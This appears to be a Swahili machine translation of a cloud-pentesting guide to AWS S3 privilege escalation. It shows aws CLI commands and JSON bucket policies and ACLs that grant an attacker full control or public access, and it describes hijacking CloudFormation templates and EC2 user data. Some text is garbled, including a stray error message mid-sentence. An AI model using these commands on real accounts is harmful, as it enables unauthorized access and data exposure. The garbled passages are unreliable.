Mshambuliaji mwenye ruhusa hizo kwenye vikombezi vya kuvutia anaweza kuteka rasilmali na kuboresha mamlaka.
Kwa mfano, mshambuliaji mwenye ruhusa hizo kwenye kikombezi cha cloudformation kilichoitwa "cf-templates-nohnwfax6a6i-us-east-1" ataweza kuteka upelekaji. Upatikanaji unaweza kutolewa kwa sera ifuatayo:
Na utekaji nyara unawezekana kwa sababu kuna dirisha fupi la muda kutoka wakati templeti inapakiwa kwenye ndoo hadi wakati templeti inapowekwa. Mshambuliaji anaweza tu kuunda kazi ya lambda kwenye akaunti yake ambayo ita chochea wakati arifa ya ndoo inapotumwa, na kuteka nyaramaudhui ya ndoo hiyo.
Hizi ni ruhusa za kupata na kupakia vitu kwenye S3. Huduma kadhaa ndani ya AWS (na nje yake) hutumia uhifadhi wa S3 kuhifadhi faili za usanidi.
Mshambuliaji mwenye upatikanaji wa kusoma wanaweza kupata habari nyeti.
Mshambuliaji mwenye upatikanaji wa kuandika wanaweza kurekebisha data kwa matumizi mabaya ya huduma fulani na kujaribu kuinua mamlaka.
Hizi ni baadhi ya mifano:
Ikiwa kifaa cha EC2 kinahifadhi data ya mtumiaji kwenye ndoo ya S3, mshambuliaji anaweza kuibadilisha ili kutekeleza nambari ya aina yoyote ndani ya kifaa cha EC2.
s3:PutBucketPolicy
Mshambuliaji, ambaye lazima awe kutoka kwenye akaunti ile ile, failure The specified method is not allowed itakuwa kichocheo, na ruhusa hii ataweza kujipatia ruhusa zaidi juu ya ndoo(s) kuruhusu yeye kusoma, kuandika, kurekebisha, kufuta na kufichua ndoo.
# Update Bucket policyawss3apiput-bucket-policy--policyfile:///root/policy.json--bucket<bucket-name>## JSON giving permissions to a user and mantaining some previous root access{"Id":"Policy1568185116930","Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123123123123:root"},"Action":"s3:ListBucket","Resource":"arn:aws:s3:::somebucketname"},{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123123123123:user/username"},"Action":"s3:*","Resource":"arn:aws:s3:::somebucketname/*"}]}## JSON Public policy example### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{"Id":"Policy1568185116930","Version":"2012-10-17","Statement": [{"Sid":"Stmt1568184932403","Action": ["s3:ListBucket"],"Effect":"Allow","Resource":"arn:aws:s3:::welcome","Principal":"*"},{"Sid":"Stmt1568185007451","Action": ["s3:GetObject"],"Effect":"Allow","Resource":"arn:aws:s3:::welcome/*","Principal":"*"}]}
s3:GetBucketAcl, s3:PutBucketAcl
Mshambuliaji anaweza kutumia ruhusa hizi kumpa upatikanaji zaidi kwenye vikombe maalum.
Tambua kwamba mshambuliaji hahitaji kuwa kutoka kwenye akaunti ile ile. Zaidi ya hayo, upatikanaji wa kuandika.
# Update bucket ACLawss3apiget-bucket-acl--bucket<bucket-name>awss3apiput-bucket-acl--bucket<bucket-name>--access-control-policyfile://acl.json##JSON ACL example## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.{"Owner":{"DisplayName":"<DisplayName>","ID":"<ID>"},"Grants": [{"Grantee":{"Type":"Group","URI":"http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},"Permission":"FULL_CONTROL"}]}## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectAcl
Mshambuliaji anaweza kutumia ruhusa hizi kumpa ufikiaji zaidi kwa vitu maalum ndani ya vikombe.
# Update bucket object ACLawss3apiget-object-acl--bucket<bucekt-name>--keyflagawss3apiput-object-acl--bucket<bucket-name>--keyflag--access-control-policyfile://objacl.json##JSON ACL example## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.{"Owner":{"DisplayName":"<DisplayName>","ID":"<ID>"},"Grants": [{"Grantee":{"Type":"Group","URI":"http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},"Permission":"FULL_CONTROL"}]}## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectVersionAcl
Mshambuliaji mwenye mamlaka haya anatarajiwa kuweza kuweka Acl kwa toleo maalum la kitu
